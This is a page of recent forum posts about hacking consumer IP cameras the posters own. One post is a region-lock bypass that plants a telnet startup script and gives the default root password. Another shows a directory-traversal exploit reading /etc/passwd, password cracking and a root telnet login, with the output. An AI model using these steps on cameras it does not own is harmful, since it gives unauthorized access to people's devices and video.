Recent Posts

Pages: [1] 2 3 ... 10
1
Hacking & Modding / Re: In over my head/dumb questions
« Last post by salukikev on July 22, 2017, 04:19:41 pm »
Hi,
Sorry I didn't get a notice of this reply until I happened back here to research!   That is a lot of info to process!  It certainly looks like there's a lot to learn!  Isn't there an option to use "pelco" protocol which addresses this directly (without having to "hack" anything?).  Also, I picked this camera board specifically due to it's diminutive size on a single board (32mm x 32mm).  If there are any more appropriate camera boards which are of this size or smaller I would be very interested in buying one of those instead!
Thanks!

ps.  It seems to be drastically difficult to post responses here as I have first a captcha, and then three additional questions, at least one of which is very difficult/ambiguous to answer.  For example:  "What number comes before Yan An Zhong lu in the address? (use numbers):"   What- the URL address?  The mailing address?   Nothing is listed here on this page or the home page of the site.  I have to repost this until I get a manageable question and this seems to happen each time even though I'm logged in!
2
Site Announcements / Forum, software updates
« Last post by admin on July 14, 2017, 03:20:24 am »
Updated forum software to 2.0.14, changed default template to the traditional default, as I need to work on the old template to make it compatible.

Added some boards for the XiaoMi camera range, as I have some, and will probably fiddle with them!

3
Xiaoyi Camera (小蚁) / Region lock fix
« Last post by admin on July 14, 2017, 03:08:48 am »
From my page here - http://www.computersolutions.cn/blog/2016/09/xiaomi-camera-bs-region-locking-fix/

Essentially -

Enable telnet.
Login.
Kill the watchdog, and kill the camera app.
rename the api call to check the country.

-----
Create a folder named test on an SD card.
Create a plain text file called equip_test.sh in that folder, and add the following bash script:

Code: [Select]
#!/bin/sh
# Telnet
if [ ! -f "/etc/init.d/S88telnet" ]; then
echo "#!/bin/sh" > /etc/init.d/S88telnet
echo "telnetd &" >> /etc/init.d/S88telnet
chmod 755 /etc/init.d/S88telnet
fi
dr=`dirname $0`
# fix bootcycle
mv $dr/equip_test.sh $dr/equip_test.sh.moved
reboot

The script will enable telnet on the camera, and then rename the script so it doesn’t run again on the next boot.

Stick the prepared card into the camera, power on, and it should reboot (twice).
If you check the open ports on the camera ip you should now see port 23 (telnet) is open.

Login with the default user/pass (as below) via telnet

User: root
Password: 1234qwer

Once telnet’d in, enter the following, line by line –

Find and kill the watchdog process

killall watch_process

Find and kill /home/cloud process so we can edit it without the watchdog watch_process restarting it

killall cloud

Change the check within /home/cloud executable to query a fake domain so it never returns a failure, then reboot.


Code: [Select]
sed -i 's|api.xiaoyi.com/v4/ipc/check_did|api.xiaoyi.foo/v4/ipc/check_did|g' /home/cloud
reboot
5
Hacking & Modding / Re: In over my head/dumb questions
« Last post by admin on July 14, 2017, 02:13:09 am »
Really depends on the board you have, and what gpio's are available to use, and how much flash / ram (for user space software etc).

Do you have the Hi3518e SoC SDK?

You'll need the SDK to get started, and compile a rom with kernel, userfs etc
Maybe the supplier will give you a ready to use kernel/rom/userfs that you can start from.

You'll need to have a  uBoot on the board.  Hopefully will have one already, otherwise you'll also need an SPI flash programmer to program the uBoot.
You'll need to be able to setup a crosscompiler environment (suggest use Docker or similar virtualized system to setup, then you can migrate easily).
You'll need to unpack the SDK, then be able to compile kernel.
You'll need to learn how to setup rom in flash.

Suggest read the uCLinux posts from 2011 where I talk about similar things.  Its relevant, although not 100% relevant to your particular board.


Also suggest reading other peoples posts, e.g. https://felipe.astroza.cl/hacking-hi3518-based-ip-camera/

Good luck.

Might want to think about using something like an ESP8266 for your gimbal to control sensors, as that has wifi, and they're dirt cheap.
6
Firmware / Hi 3518E BLK18E-0012 50h10PE-WP Firmware
« Last post by winek0 on July 09, 2017, 04:00:13 am »
Hi I have a problem with my camera after the update does not start looking for a firmware for it.



U-Boot 2010.06-svn (Oct 14 2015 - 15:07:23)

DRAM:  256 MiB
Check spi flash controller v350... Found
Spi(cs1) ID: 0xC2 0x20 0x17 0xC2 0x20 0x17
Spi(cs1): Block:64KB Chip:8MB Name:"MX25L6406E"
envcrc 0xd2097268
ENV_SIZE = 0xfffc
In:    serial
Out:   serial
Err:   serial
Press Ctrl+C to stop autoboot
CFG_BOOT_ADDR:0x58040000
8192 KiB hi_sfc at 0:0 is now current device

### boot load complete: 1973968 bytes loaded to 0x82000000
### SAVE TO 80008000 !
## Booting kernel from Legacy Image at 82000000 ...
   Image Name:   linux
   Image Type:   ARM Linux Kernel Image (uncompressed)
   Data Size:    1973904 Bytes = 1.9 MiB
   Load Address: 80008000
   Entry Point:  80008000


load=0x80008000,_bss_end=80829828,image_end=801e9e90,boot_sp=807c7168
   Loading Kernel Image ... OK
OK

Starting kernel ...

Uncompressing Linux... done, booting the kernel.



7
Hacking & Modding / In over my head/dumb questions
« Last post by salukikev on July 05, 2017, 01:55:27 am »
Hi guys,
I'm delighted to have discovered this forum recently as I'm expecting the arrival of a 32x32mm 720P IP camera tomorrow featuring the Hi3518E (https://www.alibaba.com/product-detail/720P-CMOS-Onivf-IP-module-H_60352228981.html).

I've read this is a popular configuration to access and hack the linux OS.   Unfortunately this is one part of a much larger project and I'm a terrible programmer only just getting familiar with Linux itself.  My focus has always been on mechanical items, but I'm familiar enough with electronics- this is still very new territory for me.  So apologies in advance for any ignorant questions.

1. The system that controls this camera will have two sets of coordinates for it's 2 axis gimbal system.
2. Self-contained values for X & Z axis motors, I say self contained because values need not come from the Ethernet port, but rather from a MPU6050 sensor or similar, so yes- it will be trying to level itself out continuously.
3. The other set of values WILL need to come from the ethernet connection and they will constitute an offset value so that the camera can be driven to move from the other (leveling) values.

I realize that it is almost certain that I will need a separate microcontroller to handle this, but I thought that maybe at least the 2nd set of values could come through the IP camera board since it will already be networked, and will require negligible bandwidth, and I could thusly avoid all the complication of adding a separate board, ethernet hub/switch etc. etc. only to get a few PWM signals in there.  Space is at a premium for this application.

Short of that, I arrived here reading up on ways to reduce video latency.  This particular IP camera will go through a 10/100 mini ethernet media converter (fiber optic 9/125) as well.  Due to aforementioned size constraints I'm settling for 720p at 30fps even though I was shooting for at least 1080p.  This board in particular is only 32x32mm in physical size, so I've got that going for me, which is nice.   I'd welcome any suggestions on finding something smaller or higher resolution at that size (or actually a round PCB would be nice even though I don't expect to find that).   OR something of similar size with a remote image sensor (via flat ribbon cable).

Anyway, as you can see, I have a lot of different directions I can move on this project.  I'm funding this out of pocket right now, but if things work out I could turn a profit someday.  As such, I'd be willing to hire someone to help with this or possibly some equity arrangement- but short of that, I'd surely love some free advice and guidance before I spiral off on a tangent here.

Anyway, thanks in advance for any tips to get me moving toward a viable solution!   have a great day!
-Kevin


8
General Discussion / Re: Secure Methods Using PHP To display Your IP Camera
« Last post by OldRadioGuy on July 03, 2017, 05:49:26 pm »
Don's website is down.  Anybody have a copy of SecureImageDisplayV50.zip available?
9
Help / How I got root on my camera
« Last post by tanranger on July 02, 2017, 04:22:42 pm »
My camera uses a mobile app (Showmo) to use a China based cloud service for all device control. I tried to http directly to the camera with my browser but all I get is a blank listing of "Index of /mnt/web/".

So I did a bit of sleuthing and found this:

https://nmap.org/book/vscan.html

So I tried that out:

Code: [Select]
$ nmap -sV -T4 -F my.camera.ip.address
This reports the following:

Code: [Select]
Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-02 15:41 EDT
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.67 seconds

So it's running uc-httpd 1.0.0.  Well a bit of googling later I come to learn that this is a httpd with a directory traversal bug.

https://packetstormsecurity.com/files/142131/XiongMai-uc-http-1.0.0-Local-File-Inclusion-Directory-Traversal.html

And there's a little python program provided to attack my camera.

Code: [Select]
$ python2 pwn.py http://192.168.1.121
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /etc/passwd
Exploiting.....


root:my-password-hash-here::/root:/bin/sh

So then I fed this into johntheripper with gpu acceleration and I got my root password in a few minutes.

Code: [Select]
$ telnet 192.168.1.121
Trying 192.168.1.121...
Connected to 192.168.1.121.
Escape character is '^]'.
IPC365 login: root
Password:
login: can't chdir to home directory '/root'
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.faraday.com/



BusyBox v1.19.4 (2014-12-19 12:49:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

So I poked around and learned this a GM8136 device.

I noticed that an SDK for a similar chip was available on openipcam, so I used that filename as an example of the naming convention and searched for "GM8136 SDK release v1.0.rar" and discovered dozens of download links. I had to guess what a download button looks like in Chinese, but I figured it out.

Following the instructions in the SDK, I was able to crosscompile a full copy of busybox and get it into my /tmp/ directory and it works beautifully.

Poking around, I've learned the following:

Essentially all of the application code lives in an encrypted (blowfish-448) ELF which uses a common unix command as its filename (possibly to make googling harder). The encrypted ELF has formatted the SD card to the WFS0.4 encrypted filesystem so it can no longer be mounted and used to store my own application data between reboots. Also, whenever I try to kill the encrypted ELF process, the camera promptly reboots after a short delay.

So the punchline is that I have root over telnet, but I cannot access the camera output, my images, or my videos. I can run my own code, but I'm stuck for now with this mystery app that may or may not be adequately secured and could conceivably already be compromised with no way for me to tell.

One bit of good news is that /proc/config.gz is present if I decided to try to roll my own kernel.

So that's how I got this far. I hope my experience helps others to explore their own cameras.

Anyway, what now?
10
Firmware / Re: Hi3516 Unknown command 'root' - try 'help'
« Last post by anil_argede on June 28, 2017, 03:23:33 am »
I'm pretty new about that module. I don't know how I do. Can you help me if you know something?

Also I want to use this module for image processing. There are some OS in that. How can I change some files in it? I wanna do some image processing with it. I need to do modification and add some code to OS. Can I do that?
Pages: [1] 2 3 ... 10